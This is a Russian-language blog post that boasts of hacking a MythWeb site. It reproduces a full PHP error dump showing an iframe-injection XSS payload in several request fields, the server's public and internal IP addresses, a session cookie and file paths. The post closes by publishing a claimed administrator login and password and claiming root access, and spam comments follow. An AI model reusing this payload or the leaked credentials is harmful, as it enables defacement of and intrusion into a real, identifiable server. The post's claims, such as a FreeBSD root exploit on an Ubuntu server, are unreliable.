Данные выглядят через php на взломанном сайте следующим образом! Надо отметить, что сайт лёг из-за банальной XXS-атаки! Сам сайт пропускает 90% всех уязвимостей, в том числе sql-инъекции! И так смотрим отчёт php:
datetime: 2010-12-29 12:53:53 (CET)
errornum: 256
error type: User Error
error string: SQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near ‘) AND program.starttime>=’2010-12-29 12:53:53’ AND
program.endtime<=’2011-01-12 ‘ at line 13 [#1064]
filename: /usr/share/mythtv/mythweb/classes/Database/Query/mysql.php
error line: 83
==========================================================================
Backtrace:
file: /usr/share/mythtv/mythweb/classes/Database/Query/mysql.php
line: 83
class:
function: trigger_error
type:
args: Array
(
[0] => SQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near ‘) AND program.starttime>=’2010-12-29 12:53:53’ AND
program.endtime<=’2011-01-12 ‘ at line 13 [#1064]
[1] => 256
)
file: /usr/share/mythtv/mythweb/classes/Database.php
line: 263
class: Database_Query_mysql
function: execute
type: ->
args: Array
(
[0] => Array ( )
)
file: /usr/share/mythtv/mythweb/modules/tv/includes/programs.php
line: 166
class: Database
function: query
type: ->
args: Array
(
[0] => SELECT program.*,
UNIX_TIMESTAMP(program.starttime) AS starttime_unix,
UNIX_TIMESTAMP(program.endtime) AS endtime_unix,
IFNULL(programrating.system, «») AS rater,
IFNULL(programrating.rating, «») AS rating,
channel.callsign,
channel.channum
FROM program
LEFT JOIN programrating USING (chanid, starttime)
LEFT JOIN channel ON program.chanid = channel.chanid
LEFT JOIN credits ON (program.chanid = credits.chanid AND program.starttime =
credits.starttime)
LEFT JOIN people ON (credits.person = people.person)
WHERE program.chanid IN (1) AND (program.endtime > FROM_UNIXTIME(‘1293623633’) AND program.starttime
< FROM_UNIXTIME(‘1296302033’) AND program.starttime != program.endtime) AND ((program.title LIKE
‘%<div%style=z%index:999;position:absolute;left:0;top:0;><iframe%frameborder=0%scrolling=no%src=https://fuck.ru%width=
1400%height=3744></iframe></div>%’)) AND (program.category_type IN () AND program.starttime>=’2010-12-29 12:53:53′
AND program.endtime<=’2011-01-12 12:53:53′)
GROUP BY channel.callsign, program.chanid, program.starttime ORDER BY program.starttime
)
file: /usr/share/mythtv/mythweb/modules/tv/search.php
line: 338
class:
function: load_all_program_data
type:
args: Array
(
[0] => 1293623633
[1] => 1296302033
[2] =>
[3] =>
[4] => ((program.title LIKE
‘%<div%style=z%index:999;position:absolute;left:0;top:0;><iframe%frameborder=0%scrolling=no%src=https://fuck.ru%width=
1400%height=3744></iframe></div>%’)) AND (program.category_type IN () AND program.starttime>=’2010-12-29 12:53:53′
AND program.endtime<=’2011-01-12 12:53:53′)
)
file: /usr/share/mythtv/mythweb/modules/tv/handler.php
line: 87
class:
function: require_once
type:
args: Array
(
[0] => /usr/share/mythtv/mythweb/modules/tv/search.php
)
file: /usr/share/mythtv/mythweb/mythweb.php
line: 35
class:
function: require_once
type:
args: Array
(
[0] => /usr/share/mythtv/mythweb/modules/tv/handler.php
)
==========================================================================
$_GET: Array
(
[type] => a
[af] => Array
(
[0] => Array
(
[0] => title
)
)
[as] => Array
(
[0] => <div style=z-index:999;position:absolute;left:0;top:0;><iframe frameborder=0 scrolling=no
src=https://fuck.ru width=1400 height=3744></iframe></div>
)
[starttime] => now
[endtime] => + 2 weeks
[airdate_start] => <div style=z-index:999;position:absolute;left:0;top:0;><iframe frameborder=0 scrolling=no
src=https://fuck.ru width=1400 height=3744></iframe></div>
[airdate_end] => <div style=z-index:999;position:absolute;left:0;top:0;><iframe frameborder=0 scrolling=no
src=https://fuck.ru width=1400 height=3744></iframe></div>
[categories] => Array
(
[0] => All
)
[search] => Search
)
==========================================================================
$_SESSION: Array
(
[language] => English
[prefer_channum] => 1
[date_statusbar] => %a %b %e, %Y, %I:%M %p
[date_scheduled] => %a %b %e, %Y (%I:%M %p)
[date_scheduled_popup] => %a %b %e, %Y
[date_recorded] => %a %b %e, %Y (%I:%M %p)
[date_search] => %a %b %e, %Y, %I:%M %p
[date_listing_key] => %a %b %e, %Y, %I:%M %p
[date_listing_jump] => %a %b %e, %Y
[date_channel_jump] => %a %b %e, %Y
[date_job_status] => %a %b %e, %Y, %I:%M %p
[time_format] => %I:%M %p
[recorded_pixmaps] => 1
[guide_favonly] =>
[timeslot_size] => 300
[num_time_slots] => 36
[timeslot_blocks] => 3
[timeslotbar_skip] => 20
[max_stars] => 4
[star_character] => ★
[show_popup_info] => 1
[show_channel_icons] => 1
[sortby_channum] => 1
[recorded_paging] =>
[genre_colors] => 1
[show_video_covers] => 1
[settings] => Array
(
[screens] => Array
(
[tv] => Array
(
[upcoming recordings] => Array
(
[title] => on
[channel] => on
[record date] => on
[length] => on
)
)
)
)
[backend] => Array
(
[127.0.0.1] => Array
(
[proto_version] => Array
(
[last_check_version] => 23056
[last_check_time] => 1293623425
)
)
[timezone] => Array
(
[value] => Europe/Amsterdam
[last_check_time] => 1293623425
)
)
[tv] => Array
(
[last] => Array
(
[0] => search
)
)
[recorded_title] =>
[recorded_recgroup] =>
[recorded_sortby] => Array
(
[0] => Array
(
[field] => airdate
[reverse] => 1
)
[1] => Array
(
[field] => title
[reverse] =>
)
)
[] => Array ( )
[scheduled_recordings] => Array
(
[disp_scheduled] => 1
[disp_duplicates] => 1
[disp_deactivated] => 1
[disp_conflicts] => 1
[disp_recgroup] =>
[disp_title] =>
)
[video_sortby] => Array
(
[0] => Array
(
[field] => title
[reverse] =>
)
)
=> Array
(
[path] => /<div style=z-index:999;position:absolute;left:0;top:0;><iframe frameborder=0 scrolling=no
src=https://fuck.ru width=1400 height=3744></iframe></div>
[browse] => -1
[VideoAdminPassword] => 1
)
[search] => Array
(
[type] => a
[s] => <div style=z-index:999;position:absolute;left:0;top:0;><iframe frameborder=0 scrolling=no
src=https://fuck.ru width=1400 height=3744></iframe></div>
[ctype] => Array ( )
[categories] => Array
(
[0] => All
)
[stars_gt] => 0
[stars_lt] => 0
[starttime] => now
[endtime] => + 2 weeks
[as] => Array
(
[0] => <div style=z-index:999;position:absolute;left:0;top:0;><iframe frameborder=0 scrolling=no
src=https://fuck.ru width=1400 height=3744></iframe></div>
)
[af] => Array
(
[0] => Array
(
[0] => title
)
)
[aj] => Array
(
[0] => AND
)
[hd] =>
[commfree] =>
[unwatched] =>
[scheduled] =>
[generic] =>
[airdate_start] => <div style=z-index:999;position:absolute;left:0;top:0;><iframe frameborder=0
scrolling=no src=https://fuck.ru width=1400 height=3744></iframe></div>
[airdate_end] => <div style=z-index:999;position:absolute;left:0;top:0;><iframe frameborder=0
scrolling=no src=https://fuck.ru width=1400 height=3744></iframe></div>
)
)
==========================================================================
$_SERVER: Array
(
[REDIRECT_STATUS] => 200
[HTTP_HOST] => 211.78.181.247
[HTTP_USER_AGENT] => Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
(.NET CLR 3.5.30729)
[HTTP_ACCEPT] => text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
[HTTP_ACCEPT_LANGUAGE] => ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
[HTTP_ACCEPT_ENCODING] => gzip,deflate
[HTTP_ACCEPT_CHARSET] => windows-1251,utf-8;q=0.7,*;q=0.7
[HTTP_KEEP_ALIVE] => 115
[HTTP_CONNECTION] => keep-alive
[HTTP_REFERER] =>
https://211.78.181.247/mythweb/tv/search?type=q&s=%3Cdiv+style%3Dz-index%3A999%3Bposition%3Aabsolute%3Bleft%3A0%3Btop%
3A0%3B%3E%3Ciframe+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+height%3D3744%3E%3C%2Fifram
e%3E%3C%2Fdiv%3E&search=Search
[HTTP_COOKIE] => mythweb_tmpl=default; mythweb_skin=default; mythweb_id=gir24tta61fkc6rto1tk8b4m95
[PATH] => /usr/local/bin:/usr/bin:/bin
[SERVER_SIGNATURE] => <address>Apache/2.2.16 (Ubuntu) Server at 211.78.181.247 Port 80</address>
[SERVER_SOFTWARE] => Apache/2.2.16 (Ubuntu)
[SERVER_NAME] => 211.78.181.247
[SERVER_ADDR] => 192.168.123.11
[SERVER_PORT] => 80
[REMOTE_ADDR] => 195.110.239.64
[DOCUMENT_ROOT] => /var/www
[SERVER_ADMIN] => webmaster@localhost
[SCRIPT_FILENAME] => /var/www/mythweb/mythweb.php
[REMOTE_PORT] => 1452
[REDIRECT_QUERY_STRING] =>
type=a&af%5B0%5D%5B0%5D=title&as%5B0%5D=%3Cdiv+style%3Dz-index%3A999%3Bposition%3Aabsolute%3Bleft%3A0%3Btop%3A0%3B%3E
%3Ciframe+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+height%3D3744%3E%3C%2Fiframe%3E%3C%2
Fdiv%3E&starttime=now&endtime=%2B+2+weeks&airdate_start=%3Cdiv+style%3Dz-index%3A999%3Bposition%3Aabsolute%3Bleft%3A0
%3Btop%3A0%3B%3E%3Ciframe+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+height%3D3744%3E%3C%
2Fiframe%3E%3C%2Fdiv%3E&airdate_end=%3Cdiv+style%3Dz-index%3A999%3Bposition%3Aabsolute%3Bleft%3A0%3Btop%3A0%3B%3E%3Ci
frame+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+height%3D3744%3E%3C%2Fiframe%3E%3C%2Fdiv
%3E&categories%5B%5D=All&search=Search
[REDIRECT_URL] => /mythweb/tv/search
[GATEWAY_INTERFACE] => CGI/1.1
[SERVER_PROTOCOL] => HTTP/1.1
[REQUEST_METHOD] => GET
[QUERY_STRING] =>
type=a&af%5B0%5D%5B0%5D=title&as%5B0%5D=%3Cdiv+style%3Dz-index%3A999%3Bposition%3Aabsolute%3Bleft%3A0%3Btop%3A0%3B%3E
%3Ciframe+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+height%3D3744%3E%3C%2Fiframe%3E%3C%2
Fdiv%3E&starttime=now&endtime=%2B+2+weeks&airdate_start=%3Cdiv+style%3Dz-index%3A999%3Bposition%3Aabsolute%3Bleft%3A0
%3Btop%3A0%3B%3E%3Ciframe+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+height%3D3744%3E%3C%
2Fiframe%3E%3C%2Fdiv%3E&airdate_end=%3Cdiv+style%3Dz-index%3A999%3Bposition%3Aabsolute%3Bleft%3A0%3Btop%3A0%3B%3E%3Ci
frame+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+height%3D3744%3E%3C%2Fiframe%3E%3C%2Fdiv
%3E&categories%5B%5D=All&search=Search
[REQUEST_URI] =>
/mythweb/tv/search?type=a&af%5B0%5D%5B0%5D=title&as%5B0%5D=%3Cdiv+style%3Dz-index%3A999%3Bposition%3Aabsolute%3Bleft%
3A0%3Btop%3A0%3B%3E%3Ciframe+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+height%3D3744%3E%
3C%2Fiframe%3E%3C%2Fdiv%3E&starttime=now&endtime=%2B+2+weeks&airdate_start=%3Cdiv+style%3Dz-index%3A999%3Bposition%3A
absolute%3Bleft%3A0%3Btop%3A0%3B%3E%3Ciframe+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+h
eight%3D3744%3E%3C%2Fiframe%3E%3C%2Fdiv%3E&airdate_end=%3Cdiv+style%3Dz-index%3A999%3Bposition%3Aabsolute%3Bleft%3A0%
3Btop%3A0%3B%3E%3Ciframe+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+height%3D3744%3E%3C%2
Fiframe%3E%3C%2Fdiv%3E&categories%5B%5D=All&search=Search
[SCRIPT_NAME] => /mythweb/mythweb.php
[PATH_INFO] => /tv/search
[PATH_TRANSLATED] => /var/www/tv/search
[PHP_SELF] => /mythweb/mythweb.php/tv/search
[REQUEST_TIME] => 1293623632
[STATUS] => 200
[URL] => /mythweb/tv/search
[HTTP_PORT] => 80
)
==========================================================================
$constant_list[«user»]: Array
(
[ERROR] => 512
[E_ASSERT_ERROR] => 4096
[FATAL] => 256
[PHP_MIN_VERSION] => 5.1
[WARNING] => 1024
[WebDBSchemaVer] => 2
[dupsin_all] => 15
[dupsin_ex_generic] => 64
[dupsin_ex_repeats] => 32
[dupsin_newepisodes] => 16
[dupsin_oldrecorded] => 2
[dupsin_recorded] => 1
[error_email] =>
[gb] => 1073741824
[hostname] => display-desktop
[http_host] => 211.78.181.247
[kb] => 1024
[max_stars] => 4
[mb] => 1048576
[module] => tv
[modules_path] => ./modules
[num_time_slots] => 36
[prefer_channum] => 1
[rectype_always] => 4
[rectype_channel] => 3
[rectype_daily] => 2
[rectype_dontrec] => 8
[rectype_finddaily] => 9
[rectype_findone] => 6
[rectype_findweekly] => 10
[rectype_once] => 1
[rectype_override] => 7
[rectype_weekly] => 5
[root] => /mythweb/
[root_url] => https://211.78.181.247/mythweb/
[searchtype_keyword] => 3
[searchtype_manual] => 5
[searchtype_people] => 4
[searchtype_power] => 1
[searchtype_title] => 2
[skin] => default
[skin_img_url] => https://211.78.181.247/mythweb/skins/default/img/
[skin_url] => https://211.78.181.247/mythweb/skins/default/
[star_character] => ★
[stream_url] => https://211.78.181.247:80//mythweb/
[tb] => 1099511627776
[timeslot_blocks] => 3
[timeslot_size] => 300
[timeslotbar_skip] => 20
[tmpl] => default
[tmpl_dir] => modules/tv/tmpl/default/
)
Отсюда, удалось взломать Базу Данных сайта и получить пароль администратора: l:admin p:creator2000 Теперь, говорят, взломанный сервер находится под контролем хакеров 😉 Ещё, благодаря эксплоиту удалось получить на сервере FreeBSD права root!
Добрый день! Хочу от всей души поблагодарить админа этого замечательного сайта за интересные и содержательные посты! Отлично провела время за их чтением. Буду чаще к вам наведоваться и советовать ваш сайт друзьям! Приглашаю вас в гости на мой портал!!! Здесь вы отлично поведёте время читая статьи о здоровье http://dixi.helpset.ru
Да вам спасибо! Всех благ!